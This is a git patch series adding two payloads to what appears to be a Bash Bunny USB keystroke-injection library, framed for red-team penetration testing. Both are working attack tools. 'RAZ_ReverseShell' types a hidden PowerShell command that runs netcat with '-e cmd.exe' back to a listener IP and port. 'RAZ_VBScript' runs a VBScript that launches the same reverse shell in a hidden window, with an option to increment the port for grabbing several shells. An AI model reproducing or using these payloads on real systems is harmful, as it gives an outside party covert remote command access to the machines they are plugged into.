From c699fb6b72f05e32298e8f1495f9414a11cfc0f3 Mon Sep 17 00:00:00 2001 From: ralphyz Date: Fri, 10 Mar 2017 15:55:23 -0500 Subject: [PATCH 1/2] Add files via upload A simple script to create a netcat reverse shell. For Red Teamers - you can auto_increment the listener port by setting a flag to true in payload.txt. netcat.exe is not included and must be sourced elsewhere. --- .../library/RAZ_ReverseShell/listener_ip.txt | 1 + .../RAZ_ReverseShell/listener_port.txt | 1 + payloads/library/RAZ_ReverseShell/payload.txt | 75 +++++++++++++++++++ 3 files changed, 77 insertions(+) create mode 100644 payloads/library/RAZ_ReverseShell/listener_ip.txt create mode 100644 payloads/library/RAZ_ReverseShell/listener_port.txt create mode 100644 payloads/library/RAZ_ReverseShell/payload.txt diff --git a/payloads/library/RAZ_ReverseShell/listener_ip.txt b/payloads/library/RAZ_ReverseShell/listener_ip.txt new file mode 100644 index 00000000..b1c12741 --- /dev/null +++ b/payloads/library/RAZ_ReverseShell/listener_ip.txt @@ -0,0 +1 @@ +192.168.1.100 \ No newline at end of file diff --git a/payloads/library/RAZ_ReverseShell/listener_port.txt b/payloads/library/RAZ_ReverseShell/listener_port.txt new file mode 100644 index 00000000..1b824382 --- /dev/null +++ b/payloads/library/RAZ_ReverseShell/listener_port.txt @@ -0,0 +1 @@ +4444 \ No newline at end of file diff --git a/payloads/library/RAZ_ReverseShell/payload.txt b/payloads/library/RAZ_ReverseShell/payload.txt new file mode 100644 index 00000000..8b71a3d0 --- /dev/null +++ b/payloads/library/RAZ_ReverseShell/payload.txt @@ -0,0 +1,75 @@ +#!/bin/bash +# +# Title: RAZ_ReverseShell +# Author: RalphyZ +# Version: 1.0 +# Target: Windows 7+ +# Dependencies: The following files must exist in the switch folder: +# nc.exe - Windows binary for netcat with the -e flag +# listener_port.txt - The Port number for the netcat listener +# listener_ip.txt - The IP Address for the netcat listener +# +# Description: Executes a netcat reverse cmd shell at a given IP and Port +# Intentionally, this script leaves a trace in the Run Box +# +# Colors: +# Green.....................Working +# White.....................Completed without error +# White (blinking)..........Incrementing the port in listener_port.txt +# Blue (blinking)...........listener_port.txt was not found +# Light-Blue (blinking).....listener_ip.txt was not found +# Amber (blinking)..........nc.exe was not found + + +# Change this if you want to enable auto_increment of the netcat port +# If true, the port number is increased by 1 everytime the script runs +# This is good for Red Teams doing PenTesting on multiple computers +auto_increment=false + +LED G +ATTACKMODE HID STORAGE + +LANGUAGE='us' + +# Get the switch position +source bunny_helpers.sh + + +# Check for all the files - error if not found. If found, put into variables +if [ ! -f "/root/udisk/payloads/${SWITCH_POSITION}/listener_port.txt" ] ; then + LED B 100 + exit 1 +else + my_port=`cat /root/udisk/payloads/${SWITCH_POSITION}/listener_port.txt` +fi + +if [ ! -f "/root/udisk/payloads/${SWITCH_POSITION}/listener_ip.txt" ] ; then + LED B G 100 + exit 1 +else + my_ip=`cat /root/udisk/payloads/${SWITCH_POSITION}/listener_ip.txt` +fi + +if [ ! -f "/root/udisk/payloads/${SWITCH_POSITION}/nc.exe" ] ; then + LED R G 100 + exit 1 +fi + +# Execute the powershell command in the run box with the appropriate variables +QUACK GUI r +QUACK DELAY 100 +QUACK STRING powershell -WindowStyle Hidden ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\${SWITCH_POSITION}\\nc.exe') -nv ${my_ip} ${my_port} -e cmd.exe" +QUACK ENTER + +# If auto_increment, then update the listener_port file +if [ "$auto_increment" = true ] ; then + LED R G B 100 + echo $((my_port + 1)) > /root/udisk/payloads/${SWITCH_POSITION}/listener_port.txt + + # Allow the write to sync to the USB + sleep 1 +fi + +# Signal everything went OK - white +LED R G B +exit 0 From 938be26260eccb12df959e3c30585817c25365f0 Mon Sep 17 00:00:00 2001 From: ralphyz Date: Fri, 10 Mar 2017 19:51:19 -0500 Subject: [PATCH 2/2] RAZ_VBScript This payload executes a VBScript as the payload. The sample VBScript creates a netcat reverse shell, but any VBScript can be substituted. netcat.exe must be sourced elsewhere. --- payloads/library/RAZ_VBScript/a.vbs | 162 ++++++++++++++++++ payloads/library/RAZ_VBScript/listener_ip.txt | 1 + .../library/RAZ_VBScript/listener_port.txt | 1 + payloads/library/RAZ_VBScript/payload.txt | 35 ++++ 4 files changed, 199 insertions(+) create mode 100644 payloads/library/RAZ_VBScript/a.vbs create mode 100644 payloads/library/RAZ_VBScript/listener_ip.txt create mode 100644 payloads/library/RAZ_VBScript/listener_port.txt create mode 100644 payloads/library/RAZ_VBScript/payload.txt diff --git a/payloads/library/RAZ_VBScript/a.vbs b/payloads/library/RAZ_VBScript/a.vbs new file mode 100644 index 00000000..fd1a23a6 --- /dev/null +++ b/payloads/library/RAZ_VBScript/a.vbs @@ -0,0 +1,162 @@ +Option Explicit + +'============================================================================== +' Title: a.vbs +' Author: RalphyZ +' Version: 1.0 +' Target: Windows 7+ +' +' Description: +' This VBScript is used by a BashBunny payload to +' to create a netcat reverse shell. The netcat listener +' IP Address and Port are stored in separate files - so that +' Red Teams can quickly change information. The "IncrementPort" +' subroutine will increase the port number by 1 every time the +' script is called. This is so that you can start multiple +' listeners while doing a PenTest, and grab multiple reverse +' shells in one trip. Uncomment that if you want the auto-increment +' +' Note: You must put the netcat executable in the strReverseShellPath directory +'============================================================================== + +' Declare Constants +Const ForReading = 1 +Const ForWriting = 2 + +' Declare Global Variables +Dim strListenerPort, strNewListenerPort, strListenerIP +Dim objFSO, objFile, strCurrentDirectory +Dim strNetCatEXE, strReverseShellPath, strListnerPortFile, strListenerIPFile + +' The netcat executable name +strNetCatEXE = "nc.exe" + +' The folder location +strReverseShellPath = "\payloads\library\RAZ_ReverseShell\" + +' The file containing the listener port +strListnerPortFile = "listener_port.txt" + +' The file containing the listener ip address +strListenerIPFile = "listener_ip.txt" + +' Create a File System Object +Set objFSO = CreateObject("Scripting.FileSystemObject") + +strCurrentDirectory = FindCurrentDirectory() + +' Read the Host IP Address (where the listener resides) +ReadHostIP + +' Read the listener port +ReadPort + +' Increment the listener port - for multiple shells +' Great for Red Teams +'IncrementPort + +' Start NetCat Reverse Shell +StartNetCat + +'============================================================================== +' Name: FindCurrentDirectory +' Arguments: None +' Return Value: None +' Description: Find the netcat executable +'============================================================================== +Function FindCurrentDirectory + Dim objDrives, d + + ' Set default return value + FindCurrentDirectory = "" + + ' Search all drives for the netcat exe + Set objDrives = objFSO.Drives + For Each d in objDrives + If (objFSO.FileExists(d + strReverseShellPath + strNetCatEXE)) Then + FindCurrentDirectory = d + strReverseShellPath + End if + Next +End Function + +'============================================================================== +' Name: ReadHostIP +' Arguments: None +' Return Value: None +' Description: Read the listener IP +'============================================================================== +Sub ReadHostIP() + ' Opens the file for reading + Set objFile = objFSO.OpenTextFile(strCurrentDirectory + strListenerIPFile , ForReading) + + ' Read the host IP + strListenerIP = objFile.ReadAll + + ' Close the file + objFile.Close +End Sub + + +'============================================================================== +' Name: ReadPort +' Arguments: None +' Return Value: None +' Description: Read the listener port +'============================================================================== +Sub ReadPort() + ' Opens the file for reading + Set objFile = objFSO.OpenTextFile(strCurrentDirectory + strListnerPortFile , ForReading) + + ' Read the listener port + strListenerPort = objFile.ReadAll + + ' Close the file + objFile.Close +End Sub + +'============================================================================== +' Name: IncrementPort +' Arguments: None +' Return Value: None +' Description: Read the listener port, increment the counter by 1, and write +' the new value +'============================================================================== +Sub IncrementPort() + ' Increment the listener port + strNewListenerPort = strListenerPort + 1 + + ' Open the file that contains the listener port for writing + Set objFile = objFSO.OpenTextFile(strCurrentDirectory + strListnerPortFile , ForWriting) + + ' Write the new (incremented) port + objFile.WriteLine strNewListenerPort + + ' Close the file + objFile.Close +End Sub + +'============================================================================== +' Name: StartNetCat +' Arguments: None +' Return Value: None +' Description: Start netcat on the appropriate port +'============================================================================== +Sub StartNetCat() + Dim strNetCat, strCommand, objShell + + ' Build the path to the netcat executable + strNetCat = objFSO.BuildPath(strCurrentDirectory, strNetCatEXE) + + ' Create the command string to run netcat on the correct ip and port, + ' and serve cmd.exe to the listener + strCommand = strNetCat + " -nv " + strListenerIP + " " + strListenerPort + " -e cmd.exe" + + ' Create the WScript Shell object + Set objShell = WScript.CreateObject ("WScript.Shell") + + ' Run the command (' , 0'= hidden) + objShell.run strCommand, 0 + + ' Free the object from memory + Set objShell = Nothing +End Sub \ No newline at end of file diff --git a/payloads/library/RAZ_VBScript/listener_ip.txt b/payloads/library/RAZ_VBScript/listener_ip.txt new file mode 100644 index 00000000..b1c12741 --- /dev/null +++ b/payloads/library/RAZ_VBScript/listener_ip.txt @@ -0,0 +1 @@ +192.168.1.100 \ No newline at end of file diff --git a/payloads/library/RAZ_VBScript/listener_port.txt b/payloads/library/RAZ_VBScript/listener_port.txt new file mode 100644 index 00000000..1b824382 --- /dev/null +++ b/payloads/library/RAZ_VBScript/listener_port.txt @@ -0,0 +1 @@ +4444 \ No newline at end of file diff --git a/payloads/library/RAZ_VBScript/payload.txt b/payloads/library/RAZ_VBScript/payload.txt new file mode 100644 index 00000000..b395f94f --- /dev/null +++ b/payloads/library/RAZ_VBScript/payload.txt @@ -0,0 +1,35 @@ +#!/bin/bash +# +# Title: RAZ_VBScript +# Author: RalphyZ +# Version: 1.0 +# Target: Windows 7+ +# Dependencies: VBScript (a.vbs) in the switch folder with this file +# +# Description: Executes a VBScript, concealed in a hidden PowerShell window +# +# Colors: +# Green.....................Working +# White.....................Completed without error +# Light-Blue (blinking).....a.vbs was not found + +LED G +ATTACKMODE HID STORAGE + +# Get the switch position +source bunny_helpers.sh + +# Check if a.vbs is present +if [ ! -f "/root/udisk/payloads/${SWITCH_POSITION}/a.vbs" ] ; then + LED B G 100 + exit 1 +fi + +# Run the VBScript +QUACK GUI r +QUACK DELAY 100 +QUACK STRING powershell -WindowStyle Hidden ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\${SWITCH_POSITION}\\a.vbs')" +QUACK ENTER + +# Green LED for finished +LED R G B \ No newline at end of file